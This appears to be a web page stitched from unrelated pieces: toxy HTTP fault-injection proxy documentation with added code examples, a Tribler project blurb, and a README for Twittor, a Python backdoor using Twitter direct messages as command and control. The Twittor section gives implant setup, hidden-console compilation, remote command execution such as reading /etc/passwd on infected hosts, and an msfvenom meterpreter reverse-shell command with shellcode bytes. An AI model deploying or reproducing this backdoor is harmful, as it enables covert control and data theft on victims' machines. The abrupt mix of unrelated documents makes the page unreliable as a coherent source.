    Rules are useful to compose, decouple and reuse logic among different poisoning scenarios. Rules can be applied at global, route or even poison scope, and they apply to both phases of poisoning.
    Rules are executed in FIFO order. Their evaluation logic is equivalent to Array#every() in JavaScript: all the rules must pass in order to proceed with the poisoning.

    Built-in rules

    Probability
    Name probability
    Poison Phase incoming / outgoing
    Enables the rule with the given probability. Useful for random poisoning.
    Arguments :
    • percentage number - Percentage of transactions to poison. Default 50
    var rule = toxy.rules.probability(85)
    toxy.rule(rule)

    Time threshold
    Name timeThreshold
    Poison Phase incoming / outgoing
    Simple rule to enable poisons based on a specific time threshold and duration. For instance, you can enable certain poisons during a specific amount of time (e.g. 1 second) within a time threshold (e.g. 1 minute).
    Arguments :
    • options object
      • duration number - Enable time interval in milliseconds. Default to 1000
      • threshold number - Time threshold in milliseconds to wait before re-enabling the poisoning. Default to 10000
    // Enable the poisoning only 100 milliseconds per each 10 seconds
    proxy.rule(toxy.rules.timeThreshold(100))
    // Enable poisoning during 1 second every minute
    proxy.rule(toxy.rules.timeThreshold({ duration: 1000, threshold: 1000 * 60 }))

    Method
    Name method
    Poison Phase incoming / outgoing
    Filters by HTTP method.
    Arguments :
    • method string|array - Method or methods to filter.
    var method = toxy.rules.method(['GET', 'POST'])
    toxy.rule(method)

    Content Type
    Filters by the Content-Type header, which must be present.
    Arguments :
    • value string|regexp - Header value to match.
    var rule = toxy.rules.contentType('application/json')
    toxy.rule(rule)

    Headers
    Name headers
    Poison Phase incoming / outgoing
    Filter by request headers.
    Arguments :
    • headers object - Headers to match by key-value pair. value can be a string, regexp, boolean or function(headerValue, headerName) => boolean
    var matchHeaders = {
      'content-type': /^application\/json/i,
      'server': true, // meaning it should be present,
      'accept': function (value, key) {
        return value.indexOf('text') !== -1
      }
    }
    
    var rule = toxy.rules.headers(matchHeaders)
    toxy.rule(rule)

    Response headers
    Name responseHeaders
    Poison Phase outgoing
    Filter by response headers from the target server. Same as the headers rule, but evaluating the outgoing response.
    Arguments :
    • headers object - Headers to match by key-value pair. value can be a string , regexp , boolean or function(headerValue, headerName) => boolean
    var matchHeaders = {
      'content-type': /^application\/json/i,
      'server': true, // meaning it should be present,
      'accept': function (value, key) {
        return value.indexOf('text') !== -1
      }
    }
    
    var rule = toxy.rules.responseHeaders(matchHeaders)
    toxy.rule(rule)

    Body
    Name body
    Poison Phase incoming / outgoing
    Match incoming body payload by a given string, regexp or custom filter function.
    This rule is pretty simple, so for complex body matching (e.g. validating against a JSON schema) you should probably write your own rule.
    Arguments :
    • match string|regexp|function - Body content to match
    • limit string - Optional. Body size limit in human-readable form, e.g. 5mb
    • encoding string - Body encoding. Default to utf8
    • length number - Body length. Default taken from the Content-Length header
    var rule = toxy.rules.body('"hello":"world"')
    toxy.rule(rule)
    
    // Or using a filter function returning a boolean
    var rule = toxy.rules.body(function contains(body) {
      return body.indexOf('hello') !== -1
    })
    toxy.rule(rule)

    Response body
    Name responseBody
    Poison Phase outgoing
    Match outgoing body payload by a given string, regexp or custom filter function.
    Arguments :
    • match string|regexp|function - Body content to match
    • encoding string - Body encoding. Default to utf8
    • length number - Body length. Default taken from Content-Length header
    var rule = toxy.rules.responseBody('"hello":"world"')
    toxy.rule(rule)
    
    // Or using a filter function returning a boolean
    var rule = toxy.rules.responseBody(function contains(body) {
      return body.indexOf('hello') !== -1
    })
    toxy.rule(rule)

    Response status
    Name responseStatus
    Poison Phase outgoing
    Evaluates the response status from the target server. Only applicable to outgoing poisons.
    Arguments :
    • range array - Pair of status codes defining the range to match. Default [200, 300].
    • lower number - Match status codes lower than this value. Default to null.
    • higher number - Match status codes higher than this value. Default to null.
    • value number - Status code to match using a strict equality comparison. Default null.
    • include array - Unordered list of status codes to match. Useful to specify custom statuses. Default null
    // Strict evaluation of the status code
    toxy.rule(toxy.rules.responseStatus(200))
    // Using a range of valid status codes
    toxy.rule(toxy.rules.responseStatus([200, 204]))
    // Using relational comparison
    toxy.rule(toxy.rules.responseStatus({ higher: 199, lower: 400 }))
    // Custom unordered status codes to match
    toxy.rule(toxy.rules.responseStatus({ include: [200, 204, 400, 404] }))

    Third-party rules
    List of available third-party rules provided by the community. PR are welcome.
    • IP - Enable/disable poisons based on the client IP address (supports CIDR, subnets, ranges...).

    How to write rules
    Rules are simple middleware functions that resolve asynchronously with a boolean value to determine whether a given HTTP transaction should be ignored when poisoning.
    Your rule must resolve with a boolean by calling the next(err, shouldIgnore) function of the middleware, passing true if the rule did not match and the poisoning should not be applied, in which case processing continues with the next middleware in the stack.
    Here's an example of a simple rule that matches the HTTP method:
    var toxy = require('toxy')
    
    function customMethodRule(matchMethod) {
      /**
       * We name the function since it's used by toxy to identify the rule to get/disable/remove it in the future
       */
      return function customMethodRule(req, res, next) {
        var shouldIgnore = req.method !== matchMethod
        next(null, shouldIgnore)
      }
    }
    
    var proxy = toxy()
    
    // Register and enable the rule
    proxy
      .get('/foo')
      .rule(customMethodRule('GET'))
      .poison(/* ... */)
    You can optionally extend the built-in rules with your own rules:
    toxy.addRule(customMethodRule)
    
    // Then you can use it like a built-in rule factory
    proxy
      .get('/foo')
      .rule(toxy.rules.customMethodRule('GET'))
    For full real-world examples, take a look at the built-in rules implementation.
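    To show how the next(err, shouldIgnore) contract above combines with the Array#every evaluation order described in the Rules section, here is an added example (not toxy's own code) of two custom rules in the same middleware style plus a small evaluator that applies the "all rules must pass" semantics. It assumes only that contract; the rule names, the X-Chaos-Test opt-in header, the matcher helper and the sample requests are constructed for this example.

```javascript
// Added example (not toxy's own code): custom rules in the toxy middleware style plus a
// small evaluator that applies the README's "all rules must pass" (Array#every) semantics.
// Assumes only the next(err, shouldIgnore) contract; names and sample data are constructed.

// Match a single header value against the matcher kinds the built-in headers rule documents:
// string (case-insensitive equality), RegExp, boolean (presence) or predicate function.
function matchHeader(value, matcher, name) {
  if (typeof matcher === 'boolean') return matcher === (value !== undefined)
  if (value === undefined) return false
  if (matcher instanceof RegExp) return matcher.test(value)
  if (typeof matcher === 'function') return Boolean(matcher(value, name))
  return String(matcher).toLowerCase() === String(value).toLowerCase()
}

// Rule factory: poison only when every header in spec matches.
// Node lowercases incoming header names, so the lookup is done in lowercase.
function customHeadersRule(spec) {
  var names = Object.keys(spec)
  return function customHeadersRule(req, res, next) {
    var matches = names.every(function (name) {
      var key = name.toLowerCase()
      return matchHeader(req.headers[key], spec[name], key)
    })
    // toxy convention: shouldIgnore === true means "do not poison this transaction"
    next(null, !matches)
  }
}

// Rule factory: poison only requests that explicitly opt in via a marker header,
// so fault injection cannot hit traffic that did not ask for it.
function customOptInRule(headerName, expected) {
  var key = headerName.toLowerCase()
  return function customOptInRule(req, res, next) {
    next(null, req.headers[key] !== expected)
  }
}

// FIFO evaluator with Array#every semantics: the first rule that asks to ignore
// stops the chain. Calls done(err, shouldPoison). Completes synchronously when the
// rules call next synchronously, asynchronously otherwise.
function evaluateRules(rules, req, res, done) {
  var i = 0
  function step(err, shouldIgnore) {
    if (err) return done(err, false)
    if (shouldIgnore) return done(null, false)
    if (i >= rules.length) return done(null, true)
    rules[i++](req, res, step)
  }
  step(null, false)
}

// Decide for a constructed request whether the poison chain would run.
function decide(headers) {
  var req = { method: 'POST', url: '/api/items', headers: headers }
  var rules = [
    customHeadersRule({ 'Content-Type': /^application\/json/i, 'User-Agent': true }),
    customOptInRule('X-Chaos-Test', '1')
  ]
  var shouldPoison = null
  evaluateRules(rules, req, {}, function (err, result) {
    shouldPoison = err ? false : result
  })
  return shouldPoison
}

console.log('json + opt-in  :', decide({ 'content-type': 'application/json', 'user-agent': 'curl/8.0', 'x-chaos-test': '1' }))
console.log('json, no opt-in:', decide({ 'content-type': 'application/json', 'user-agent': 'curl/8.0' }))
console.log('html + opt-in  :', decide({ 'content-type': 'text/html', 'user-agent': 'curl/8.0', 'x-chaos-test': '1' }))
```

    The opt-in rule is the part worth copying: gating every poison behind a marker header that only your test clients send keeps a toxy instance deployed between real services from degrading traffic that did not ask for it, and the evaluator shows why order matters, since a cheap rule placed first short-circuits the more expensive ones.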

    Programmatic API
    toxy API is completely built on top of the rocky API. In other words, you can use any of the methods, features and middleware layer natively provided by rocky.

    toxy([ options ])
    Create a new toxy proxy.
    For supported options, please see the rocky documentation
    var toxy = require('toxy')
    
    // Keep the proxy instance; the routes below are registered on it
    var proxy = toxy({ forward: 'http://server.net', timeout: 30000 })
    
    proxy
      .get('/foo')
      .poison(toxy.poisons.latency(1000))
      .withRule(toxy.rules.contentType('json'))
      .forward('http://foo.server')
    
    proxy
      .post('/bar')
      .poison(toxy.poisons.bandwidth({ bps: 1024 }))
      .withRule(toxy.rules.probability(50))
      .forward('http://bar.server')
    
    proxy
      .post('/boo')
      .outgoingPoison(toxy.poisons.bandwidth({ bps: 1024 }))
      .withRule(toxy.rules.method('GET'))
      .forward('http://boo.server')
    
    proxy.all('/*')
    
    proxy.listen(3000)

    toxy#get(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for GET method.

    toxy#post(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for POST method.

    toxy#put(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for PUT method.

    toxy#patch(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for PATCH method.

    toxy#delete(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for DELETE method.

    toxy#head(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for HEAD method.

    toxy#all(path, [ middleware... ])
    Return: ToxyRoute
    Register a new route for any method.

    toxy#poisons => Object
    Exposes a map with the built-in poisons. Prototype alias to toxy.poisons

    toxy#rules => Object
    Exposes a map with the built-in rules. Prototype alias to toxy.rules

    toxy#forward(url)
    Define a URL to forward the incoming traffic received by the proxy.

    toxy#balance(urls)
    Forward to multiple servers balancing among them.
    For more information, see the rocky docs

    toxy#replay(url)
    Define a new replay server. You can call this method multiple times to define multiple replay servers.
    For more information, see the rocky docs

    toxy#use(middleware)
    Plug in a custom middleware.
    For more information, see the rocky docs .

    toxy#useResponse(middleware)
    Plug in a response outgoing traffic middleware.
    For more information, see the rocky docs .

    toxy#useReplay(middleware)
    Plug in a replay traffic middleware.
    For more information, see the rocky docs

    toxy#requestBody(middleware)
    Intercept incoming request body. Useful to modify it on the fly.
    For more information, see the rocky docs

    toxy#responseBody(middleware)
    Intercept outgoing response body. Useful to modify it on the fly.
    For more information, see the rocky docs

    toxy#middleware()
    Return a standard middleware to use with connect/express.

    toxy#host(host)
    Overwrite the Host header with a custom value. Similar to forwardHost option.

    toxy#redirect(url)
    Redirect traffic to the given URL.

    toxy#findRoute(routeIdOrPath, [ method ])
    Find a route by ID or path and method.

    toxy#listen(port)
    Starts the built-in HTTP server, listening on a specific TCP port.

    toxy#close([ callback ])
    Closes the HTTP server.

    toxy#poison(poison)
    Alias: usePoison , useIncomingPoison
    Register a new poison to infect incoming traffic.

    toxy#outgoingPoison(poison)
    Alias: useOutgoingPoison , responsePoison
    Register a new poison to infect outgoing traffic.

    toxy#rule(rule)
    Alias: useRule
    Register a new rule.

    toxy#withRule(rule)
    Aliases: poisonRule , poisonFilter
    Apply a new rule for the latest registered poison.

    toxy#enable(poison)
    Enable a poison by name identifier

    toxy#disable(poison)
    Disable a poison by name identifier

    toxy#remove(poison)
    Return: boolean
    Remove poison by name identifier.

    toxy#isEnabled(poison)
    Return: boolean
    Checks if a poison is enabled by name identifier.

    toxy#disableAll()
    Alias: disablePoisons
    Disable all the registered poisons.

    toxy#getPoison(name)
    Return: Directive|null
    Searches for and retrieves a registered poison in the stack by name identifier.

    toxy#getIncomingPoison(name)
    Return: Directive|null
    Searches for and retrieves a registered incoming poison in the stack by name identifier.

    toxy#getOutgoingPoison(name)
    Return: Directive|null
    Searches for and retrieves a registered outgoing poison in the stack by name identifier.

    toxy#getPoisons()
    Return: array<Directive>
    Return an array of registered poisons.

    toxy#getIncomingPoisons()
    Return: array<Directive>
    Return an array of registered incoming poisons.

    toxy#getOutgoingPoisons()
    Return: array<Directive>
    Return an array of registered outgoing poisons.

    toxy#flush()
    Alias: flushPoisons
    Remove all the registered poisons.

    toxy#enableRule(rule)
    Enable a rule by name identifier.

    toxy#disableRule(rule)
    Disable a rule by name identifier.

    toxy#removeRule(rule)
    Return: boolean
    Remove a rule by name identifier.

    toxy#disableRules()
    Disable all the registered rules.

    toxy#isRuleEnabled(rule)
    Return: boolean
    Checks if the given rule is enabled by name identifier.

    toxy#getRule(rule)
    Return: Directive|null
    Searches for and retrieves a registered rule in the stack by name identifier.

    toxy#getRules()
    Return: array<Directive>
    Returns an array with the registered rules wrapped as Directive.

    toxy#flushRules()
    Remove all the rules.

    toxy.addPoison(name, fn)
    Extend built-in poisons.

    toxy.addRule(name, fn)
    Extend built-in rules.

    toxy.poisons => Object
    Exposes a map with the built-in poisons.

    toxy.rules => Object
    Exposes a map with the built-in rules.

    toxy.VERSION => String
    Current toxy semantic version.

    ToxyRoute
    ToxyRoute exposes the same interface as the global Toxy interface; it just adds some additional route-level methods.
    Further actions you perform against the ToxyRoute API will only be applicable at route level (nested). In other words: you already know the API.
    This example should clarify any doubts:
    var toxy = require('toxy')
    var proxy = toxy()
    
    // Now using the global API
    proxy
      .forward('http://server.net')
      .poison(toxy.poisons.bandwidth({ bps: 1024 }))
      .rule(toxy.rules.method('GET'))
    
    // Now create a route
    var route = proxy
      .get('/foo')
      .toPath('/bar') // Route-level API method
      .host('server.net') // Route-level API method
      .forward('http://new.server.net')
    
    // Now using the ToxyRoute interface
    route
      .poison(toxy.poisons.bandwidth({ bps: 512 }))
      .rule(toxy.rules.contentType('json'))

    Directive(middlewareFn)
    A convenient wrapper used internally for poisons and rules.
    Normally you don't need to know this interface, but it might be useful for hacking purposes or more low-level actions.

    Directive#enable()
    Return: boolean

    Directive#disable()
    Return: boolean

    Directive#isEnabled()
    Return: boolean

    Directive#rule(rule)
    Alias: filter

    Directive#handler()
    Return: function(req, res, next)

    HTTP API
    The toxy HTTP API follows the JSON API conventions, including resource based hypermedia linking.

    Usage
    For a featured use case, see the admin server example.
    const toxy = require('toxy')
    
    // Create the toxy admin server
    var admin = toxy.admin({ cors: true })
    admin.listen(9000)
    
    // Create the toxy proxy
    var proxy = toxy()
    proxy.listen(3000)
    
    // Add the toxy instance to be managed by the admin server
    admin.manage(proxy)
    
    // Then configure the proxy
    proxy
      .forward('http://my.target.net')
    
    proxy
      .get('/slow')
      .poison(toxy.poisons.bandwidth({ bps: 1024 }))
    
    // Handle the rest of the traffic
    proxy
      .all('/*')
      .poison(toxy.poisons.bandwidth({ bps: 1024 * 5 }))
    
    console.log('toxy proxy listening on port:', 3000)
    console.log('toxy admin server listening on port:', 9000)
    For more details about the admin programmatic API, see below.

    Authorization
    The HTTP API can be protected against unauthorized clients. Authorized clients must present the API key token in an API-Key or Authorization HTTP header.
    Without a key, anyone who can reach the admin port can reconfigure every managed proxy (forward targets, routes, rules and poisons), so set apiKey whenever the admin server listens on anything other than a loopback address, combine it with the ssl option so the key is not sent in clear text, and remember that cors: true opens the API to cross-origin browser requests as well.
    To enable it, simply pass the following option to the toxy admin server:
    const toxy = require('toxy')
    
    const opts = { apiKey: 's3cr3t' }
    var admin = toxy.admin(opts)
    
    admin.listen(9000)
    console.log('protected toxy admin server listening on port:', 9000)

    API
    Hierarchy :
    • Servers - Managed toxy instances
      • Rules - Globally applied rules
      • Poisons - Globally applied poisons
        • Rules - Poison-specific rules
      • Routes - List of configured routes
        • Route - Object for each specific route
          • Rules - Route-level registered rules
          • Poisons - Route-level registered poisons
            • Rules - Route-level poison-specific rules

    GET /

    Servers

    GET /servers

    GET /servers/:id

    Rules

    GET /servers/:id/rules

    POST /servers/:id/rules
    Accepts: application/json
    Example payload:
    {
      "name": "method",
      "options": "GET"
    }

    DELETE /servers/:id/rules

    GET /servers/:id/rules/:id

    DELETE /servers/:id/rules/:id

    Poisons

    GET /servers/:id/poisons

    POST /servers/:id/poisons
    Accepts: application/json
    Example payload:
    {
      "name": "latency",
      "phase": "outgoing",
      "options": { "jitter": 1000 }
    }

    DELETE /servers/:id/poisons

    GET /servers/:id/poisons/:id

    DELETE /servers/:id/poisons/:id

    GET /servers/:id/poisons/:id/rules

    POST /servers/:id/poisons/:id/rules
    Accepts: application/json
    Example payload:
    {
      "name": "method",
      "options": "GET"
    }

    DELETE /servers/:id/poisons/:id/rules

    GET /servers/:id/poisons/:id/rules/:id

    DELETE /servers/:id/poisons/:id/rules/:id

    Routes

    GET /servers/:id/routes

    POST /servers/:id/routes
    Accepts: application/json
    Example payload:
    {
      "path": "/foo",
      "method": "GET",
      "forward": "http://my.server"
    }
    path is required; method accepts a single HTTP verb or ALL for all methods; forward is an optional custom forward server URL for this route.

    DELETE /servers/:id/routes

    GET /servers/:id/routes/:id

    DELETE /servers/:id/routes/:id

    Route rules

    GET /servers/:id/routes/:id/rules

    POST /servers/:id/routes/:id/rules
    Accepts: application/json
    Example payload:
    {
      "name": "method",
      "options": "GET"
    }

    DELETE /servers/:id/routes/:id/rules

    GET /servers/:id/routes/:id/rules/:id

    DELETE /servers/:id/routes/:id/rules/:id

    Route poisons

    GET /servers/:id/routes/:id/poisons

    POST /servers/:id/routes/:id/poisons
    Accepts: application/json
    Example payload:
    {
      "name": "latency",
      "phase": "outgoing",
      "options": { "jitter": 1000 }
    }

    DELETE /servers/:id/routes/:id/poisons

    GET /servers/:id/routes/:id/poisons/:id

    DELETE /servers/:id/routes/:id/poisons/:id

    GET /servers/:id/routes/:id/poisons/:id/rules

    POST /servers/:id/routes/:id/poisons/:id/rules
    Accepts: application/json
    Example payload:
    {
      "name": "method",
      "options": "GET"
    }

    DELETE /servers/:id/routes/:id/poisons/:id/rules

    GET /servers/:id/routes/:id/poisons/:id/rules/:id

    DELETE /servers/:id/routes/:id/poisons/:id/rules/:id
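    As an added example (not toxy's own code), the following Python client drives the admin HTTP API laid out above: it builds the nested resource paths of the hierarchy, sends the rule, poison and route payloads shown in the examples as application/json, and presents the key from the Authorization section in an API-Key header. The server and route id values, the FakeTransport class and the assumption that plain JSON bodies are accepted on POST are mine; the canned {"ok": true} reply is constructed and is not toxy's real response format.

```python
import io
import json
import urllib.parse
import urllib.request


class ToxyAdminClient:
    """Client for the toxy admin HTTP API described above. Written for this
    page, not part of toxy. Assumes the key is accepted in an `API-Key`
    header (one of the two header names the Authorization section lists) and
    that bodies are sent as application/json. `opener` is any callable with
    urlopen's (request, timeout=...) signature returning a file-like object,
    so a fake transport can stand in for a live admin server."""

    def __init__(self, base_url, api_key=None, opener=urllib.request.urlopen, timeout=5):
        self.base_url = base_url.rstrip('/')
        self.api_key = api_key
        self.opener = opener
        self.timeout = timeout

    def _path(self, *parts):
        # quote every id so a caller-supplied id cannot add path segments
        return '/' + '/'.join(urllib.parse.quote(str(p), safe='') for p in parts)

    def _request(self, method, path, payload=None):
        headers = {'Accept': 'application/json'}
        data = None
        if payload is not None:
            data = json.dumps(payload).encode('utf-8')
            headers['Content-Type'] = 'application/json'
        if self.api_key:
            headers['API-Key'] = self.api_key
        req = urllib.request.Request(self.base_url + path, data=data, headers=headers, method=method)
        resp = self.opener(req, timeout=self.timeout)
        try:
            body = resp.read()
        finally:
            resp.close()
        return json.loads(body) if body else None

    # server-level resources
    def servers(self):
        return self._request('GET', self._path('servers'))

    def add_rule(self, server_id, name, options):
        return self._request('POST', self._path('servers', server_id, 'rules'),
                             {'name': name, 'options': options})

    def add_poison(self, server_id, name, options, phase=None):
        payload = {'name': name, 'options': options}
        if phase:
            payload['phase'] = phase          # 'outgoing' in the page's examples
        return self._request('POST', self._path('servers', server_id, 'poisons'), payload)

    def add_route(self, server_id, path, method='ALL', forward=None):
        payload = {'path': path, 'method': method}
        if forward:
            payload['forward'] = forward
        return self._request('POST', self._path('servers', server_id, 'routes'), payload)

    # route-level resources: same shape, one level deeper in the hierarchy
    def add_route_poison(self, server_id, route_id, name, options, phase=None):
        payload = {'name': name, 'options': options}
        if phase:
            payload['phase'] = phase
        return self._request('POST', self._path('servers', server_id, 'routes', route_id, 'poisons'), payload)

    def delete_route_poisons(self, server_id, route_id):
        return self._request('DELETE', self._path('servers', server_id, 'routes', route_id, 'poisons'))


class FakeTransport:
    """Constructed stand-in for urlopen: records each request and answers with a
    canned JSON body, so the client can be exercised offline."""

    def __init__(self, reply=None):
        self.calls = []
        self.reply = json.dumps(reply if reply is not None else {}).encode('utf-8')

    def __call__(self, req, timeout=None):
        self.calls.append({
            'method': req.get_method(),
            'url': req.full_url,
            'headers': {k.lower(): v for k, v in req.header_items()},
            'body': json.loads(req.data.decode('utf-8')) if req.data else None,
        })
        return io.BytesIO(self.reply)


if __name__ == '__main__':
    transport = FakeTransport(reply={'ok': True})
    client = ToxyAdminClient('http://127.0.0.1:9000', api_key='s3cr3t', opener=transport)
    client.add_rule('srv1', 'method', 'GET')
    client.add_route_poison('srv1', 'r1', 'latency', {'jitter': 1000}, phase='outgoing')
    for call in transport.calls:
        print(call['method'], call['url'], call['body'])
```

    Against a real admin server, drop the opener argument and point base_url at the host and port passed to admin.listen(); the ids come from GET /servers and GET /servers/:id/routes.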

    Programmatic API
    The built-in HTTP admin server also exposes a simple programmatic interface for extension and experimentation. For instance, you can plug additional middleware into the admin server, or register new routes.

    toxy.admin([ opts ])
    Returns: Admin
    Supported options :
    • apiKey string - Optional API key to protect the server
    • port number - Optional TCP port to listen on
    • cors boolean - Enable CORS for web browser access
    • middleware array<function> - Plug in additional middleware
    • ssl object - Node.js HTTPS server TLS options

    Admin#listen([ port, host ])
    Start listening on the network.

    Admin#manage(toxy)
    Manage a toxy server instance.

    Admin#find(toxy)
    Find a toxy instance. Accepts toxy server ID or toxy instance.

    Admin#remove(toxy)
    Stop managing a toxy instance.

    Admin#use(...middleware)
    Register a middleware.

    Admin#param(...middleware)
    Register a param middleware.

    Admin#get(path, [ ...middleware ])
    Register a GET route.

    Admin#post(path, [ ...middleware ])
    Register a POST route.

    Admin#put(path, [ ...middleware ])
    Register a PUT route.

    Admin#delete(path, [ ...middleware ])
    Register a DELETE route.

    Admin#patch(path, [ ...middleware ])
    Register a PATCH route.

    Admin#all(path, [ ...middleware ])
    Register a route accepting any HTTP method.

    Admin#middleware(req, res, next)
    Middleware to plug in with connect/express.

    Admin#close(cb)
    Stop the server.


    Download Toxy

    Tribler - Download Torrents using Tor-inspired onion routing


    Tribler is a research project of Delft University of Technology. Tribler was created over nine years ago as a new open source Peer-to-Peer file sharing program. During this time over one million users have installed it successfully and three generations of Ph.D. students tested their algorithms in the real world.

    Tribler is the first client which continuously improves upon the aging BitTorrent protocol from 2001 and addresses its flaws. We expanded it with, amongst others, streaming from magnet links, keyword search for content, channels and reputation-management. All these features are implemented in a completely distributed manner, not relying on any centralized component. Still, Tribler manages to remain fully backwards compatible with BitTorrent.

    Work on Tribler has been supported by multiple European Internet research grants. In total we received 3,538,609 Euro in funding for our open source self-organising systems research.
    Roughly 10 to 15 scientists and engineers work on it full-time. Our ambition is to make darknet technology, security and privacy the default for all Internet users. As of 2013 we have received code from 46 contributors and 143,705 lines of code.

    Vision & Mission

    "Push the boundaries of self-organising systems, robust reputation systems and craft collaborative systems with millions of active participants under continuous attack from spammers and other adversarial entities."


    Twittor - A fully featured backdoor that uses Twitter as a C&C server


    A stealthy Python based backdoor that uses Twitter (Direct Messages) as a command and control server. This project has been inspired by Gcat, which does the same but using a Gmail account.

    Setup
    For this to work you need:
    • A Twitter account ( Use a dedicated account! Do not use your personal one! )
    • Register an app on Twitter with Read, write, and direct messages Access levels.
    Install the dependencies:
    $ pip install -r requirements.txt
    
    This repo contains two files:
    • twittor.py which is the client
    • implant.py the actual backdoor to deploy
    In both files, edit the access token part and add the ones that you previously generated:
    CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
    CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
    
    ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
    ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
    
    USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'
    You will probably want to compile implant.py into an executable using PyInstaller. To remove the console window when compiling with PyInstaller, the flags --noconsole --onefile will help.

    Usage
    In order to run the client, launch the script.
    $ python twittor.py
    
    You'll then get into an 'interactive' shell which offers a few commands:
    $ help
    
        refresh - refresh C&C control
        list_bots - list active bots
        list_commands - list executed commands
        !retrieve <jobid> - retrieve jobid command
        !cmd <MAC ADDRESS> command - execute the command on the bot
        !shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only)
        help - print this usage
        exit - exit the client
    
    $ 
    
    • Once you've deployed the backdoor on a couple of systems, you can check the available clients using the list_bots command:
    $ list_bots
    B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
    $
    
    The output is the MAC address, which is used to uniquely identify the system, followed by information on the OS the implant is running on. In this case a Linux box.
    • Let's issue a command to an implant:
    $ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
    [+] Sent command "cat /etc/passwd" with jobid: UMW07r2
    $
    
    Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd; the script then outputs the jobid that we can use to retrieve the output of that command.
    • Lets get the results!
    $ !retrieve UMW07r2
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    (...)
    
    The command to use in that case is !retrieve followed by the jobid of the command.
    • Refresh results
    In order to retrieve new bots and command outputs, and to force the client to refresh its results, use the refresh command.
    $ refresh
    [+] Sending command to retrieve alive bots
    [+] Sleeping 10 secs to wait for bots
    $
    
    This will send a PING request and wait 10 seconds for the bots to answer. Direct messages are then parsed: the bot list is refreshed, and so is the command list, including new command outputs.
    • Retrieve previous commands
    As said earlier, previous commands are retrieved from older direct messages (the limit is 200) and you can list them using the list_commands command:
    $ list_commands
    8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
    VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
    9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
    aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
    8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
    $
    
    • Running shellcode (Windows hosts)
    This option might be handy in order to obtain a meterpreter session.
    Generate your meterpreter shellcode, like:
    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python
    (...)
    Payload size: 299 bytes
    buf =  ""
    buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
    buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
    buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
    buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
    buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
    buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
    buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
    buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
    buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
    buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
    buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
    buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
    buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
    buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
    buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x01\x68"
    buf += "\x02\x00\x0e\x1f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
    buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
    buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
    buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a"
    buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
    buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
    buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6"
    buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
    
